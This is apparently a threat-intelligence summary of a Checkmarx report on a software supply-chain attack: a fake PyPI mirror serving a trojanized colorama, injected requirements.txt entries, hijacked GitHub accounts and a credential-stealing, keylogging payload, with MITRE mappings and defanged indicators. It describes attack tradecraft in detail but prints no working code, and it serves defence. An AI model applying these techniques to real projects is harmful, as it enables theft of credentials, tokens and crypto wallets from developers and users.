Keypoints
- Attackers registered typosquatted domains (e.g., files[.]pypihosted[.]org) and hosted a fake Python package mirror to serve malicious packages and a poisoned colorama.
- Malicious packages (notably yocolor) and modified requirements.txt entries directed pip to the fake mirror, enabling automatic installation of the trojanized colorama.
- High-reputation GitHub accounts were hijacked—likely via stolen browser cookies—and used to commit requirements changes pointing to the fake mirror, increasing trust and reach.
- The injected colorama contained hidden malicious code (whitespace padding, obfuscation) that fetched additional encrypted/obfuscated payloads from remote servers and executed them with Python.
- Final payload implemented persistence (registry run key), extensive data theft (browser cookies, Discord tokens, crypto wallets, Telegram sessions, files), keylogging, and exfiltration via web services (GoFile/Anonfiles and HTTP uploads).
- Attackers used evasion techniques (zlib compression, misleading variable names, non-ASCII strings) and blended malicious commits with legitimate files to avoid detection.
- Checkmarx reported abused domains and monitored the campaign; multiple malicious PyPI packages and sample package names were identified in the investigation.
MITRE Techniques
- [T1195.002] Compromise Software Dependencies and Development Tools – The attackers “deployed a fake Python packages mirror” and “poisoned copy of the popular package ‘colorama’”, using a malicious dependency to contaminate builds.
- [T1078] Valid Accounts – The adversary “hijack GitHub accounts with high reputations and use the resources under those accounts to contribute malicious commits,” leveraging compromised accounts to push malicious requirements.
- [T1105] Ingress Tool Transfer – The trojanized package “fetches and executes another piece of Python code from ‘hxxps[:]//pypihosted[.]org/version,’” downloading additional payloads from attacker-controlled servers.
- [T1059.006] Command and Scripting Interpreter: Python – The attack uses Python to run downloaded code and executes fetched obfuscated snippets via ‘exec’ to carry out subsequent stages.
- [T1027] Obfuscated Files or Information – The actor “used a significant amount of whitespace to push the malicious code off-screen” and applied zlib compression and misleading names to hide malicious logic.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – The malware achieves persistence by “modifying the Windows registry to create a new run key” so the payload runs on reboot.
- [T1555.003] Credentials from Web Browsers – The final payload harvests “cookies, autofill information, browsing history, bookmarks, credit cards, and login credentials” from multiple browsers to obtain credentials and session tokens.
- [T1056.001] Input Capture: Keylogging – The malicious final payload includes a “keylogging component” that records keystrokes and uploads the logs to the attacker’s server.
- [T1567] Exfiltration Over Web Service – Stolen data is uploaded to anonymous file-sharing services and sent over HTTP; the report notes use of “GoFile and Anonfiles” and HTTP uploads to attacker infrastructure.
Indicators of Compromise
- [Malicious package URL] Fake PyPI mirror packages – hxxps[:]//files[.]pypihosted[.]org/…/colorama-0.4.6.tar.gz, hxxps[:]//files[.]pythanhosted.org/…/colorama-0.4.5.tar.gz
- [Domains] Typosquatted mirrors and endpoints – files[.]pypihosted[.]org, pypihosted[.]org/version
- [IP addresses] Remote payload and C2 hosts – 162[.]248[.]100[.]217, 162[.]248[.]101[.]215
- [Package names] Malicious PyPI packages used for delivery – yocolor (0.4.6), and trojanized colorama
- [File hashes] Example package/file hashes observed – 0C1873196DBD88280F4D5CF409B7B53674B3ED85F8A1A28ECE9CAF2F98A71207, 35AC61C83B85F6DDCF8EC8747F44400399CE3A9986D355834B68630270E669FB (and 1 more hash)
The attackers set up a typosquatted Python package mirror (e.g., files[.]pypihosted[.]org) and published malicious packages—most notably a trojanized copy of colorama delivered via a PyPI package named yocolor and by inserting malicious dependency URLs into requirements.txt files. They exploited pip’s ability to fetch packages from arbitrary URLs so that when projects installed dependencies, pip downloaded the poisoned colorama from the fake mirror instead of the legitimate index.
Inside the trojanized colorama the adversary concealed a small malicious bootstrap (initially in colorama/tests/__init__.py, later moved to colorama/__init__.py) using heavy whitespace padding to hide the code from cursory inspection. That bootstrap fetches encrypted/obfuscated Python code from pypihosted[.]org/version and additional payloads from IPs such as 162.248.100.217/inj, decrypts and decompresses them, and executes them via Python (exec). Obfuscation techniques included zlib compression, non-ASCII strings, and misleading variable names to complicate analysis.
The staged payload installs persistence by creating registry run keys, then deploys a final data-stealing module that enumerates browsers and applications (Chrome/Edge/Brave/Vivaldi/Opera/Yandex, Discord, Telegram, multiple crypto wallets), extracts cookies, tokens, wallet files, Telegram sessions, and user files, captures keystrokes, compresses exfiltrated artifacts, and uploads them to attacker-controlled endpoints and public file-sharing services (e.g., GoFile/Anonfiles) via HTTP. Compromised GitHub accounts (likely via stolen session cookies) were used to insert malicious requirements into trusted repositories, amplifying distribution and impact.
Read more: https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/